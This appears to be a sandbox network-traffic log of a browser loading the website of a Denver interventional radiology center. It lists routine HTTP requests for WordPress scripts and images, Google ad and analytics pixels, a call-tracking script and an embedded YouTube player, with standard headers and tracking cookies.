Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_f4f041ab9c04771db09b5b5afee674e4.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/99-1536x922.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_f8baa9b6a9ab8164f24c1ee632ee2a56.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11060750287/?random=1743111905938&cv=11&fst=1743109200000&bg=ffffff&guid=ON&async=1&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&u_w=1280&u_h=1024&url=https%3A%2F%2Fmipscenter.com%2F&hn=www.googleadservices.com&frm=0&tiba=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&npa=0&pscdl=noapi&auid=1553177151.1743111906&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCjtLzM578YerSR85seC34ejCBTbwVKx8ZbJg&random=2704690578&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_fabf8e009e52edaa7a906809cd3f53ce.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_1638974264a50e67fbfefe35c0332581.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_45d0d23ed0cb5c8dceb54a1359eec7b6.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /companies/373196729/b510a7ffe1052e4121c0/12/swap.js HTTP/1.1Host: cdn.callrail.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_40635054e327b749517fbfc876906d27.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_6755415003869bd599c3fae8e9792027.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_40972936af67684ca90b6211f9216288.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_5b23ded83b6a631b06040ed574e43dd6.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_58be82360cff05a82d3af2e489d97263.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11060750287/?random=1743111905938&cv=11&fst=1743109200000&bg=ffffff&guid=ON&async=1&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&u_w=1280&u_h=1024&url=https%3A%2F%2Fmipscenter.com%2F&hn=www.googleadservices.com&frm=0&tiba=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&npa=0&pscdl=noapi&auid=1553177151.1743111906&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCjtLzM578YerSR85seC34ejCBTbwVKx8ZbJg&random=2704690578&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_de72fa617fd0f9a08176003df4de2044.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_c2f22d5d09dfdd628e1facc491a5a0fd.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_cc3b1f8e28a52ec4b3ec993ec779e67d.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/hr-e1614875034935.png HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/new-services.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/UFE-360x165.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/09/varicocele-callout-e1683787623318.jpeg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/Capture-1536x675.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/hr-e1614875034935.png HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/content-bg-2-1536x624.png HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /signals/js/clients/scc-c2/scc-c2.min.js HTTP/1.1Host: img1.wsimg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/new-services.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /embed/LUgFEp-Aczk HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/UFE-360x165.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /mipscenter.com/wp-content/uploads/2021/03/favicon.png?resize=300%2C300&ssl=1 HTTP/1.1Host: i0.wp.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/8a8ac953/www-player.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/embed/LUgFEp-AczkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: YSC=x-wRkeS1hmE; __Secure-ROLLOUT_TOKEN=CPa41ZfDsfCEbhCOn6nxnauMAxiOn6nxnauMAw%3D%3D; VISITOR_INFO1_LIVE=ZLYEpCx924k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgWg%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/8a8ac953/player_ias.vflset/en_US/embed.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/embed/LUgFEp-AczkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: YSC=x-wRkeS1hmE; __Secure-ROLLOUT_TOKEN=CPa41ZfDsfCEbhCOn6nxnauMAxiOn6nxnauMAw%3D%3D; VISITOR_INFO1_LIVE=ZLYEpCx924k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgWg%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/8a8ac953/www-embed-player.vflset/www-embed-player.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/embed/LUgFEp-AczkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: YSC=x-wRkeS1hmE; __Secure-ROLLOUT_TOKEN=CPa41ZfDsfCEbhCOn6nxnauMAxiOn6nxnauMAw%3D%3D; VISITOR_INFO1_LIVE=ZLYEpCx924k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgWg%3D%3D
Source: global trafficHTTP traffic detected: GET /s/player/8a8ac953/player_ias.vflset/en_US/base.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/embed/LUgFEp-AczkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: YSC=x-wRkeS1hmE; __Secure-ROLLOUT_TOKEN=CPa41ZfDsfCEbhCOn6nxnauMAxiOn6nxnauMAw%3D%3D; VISITOR_INFO1_LIVE=ZLYEpCx924k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgWg%3D%3D
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/09/varicocele-callout-e1683787623318.jpeg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/Capture-1536x675.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/content-bg-2-1536x624.png HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z
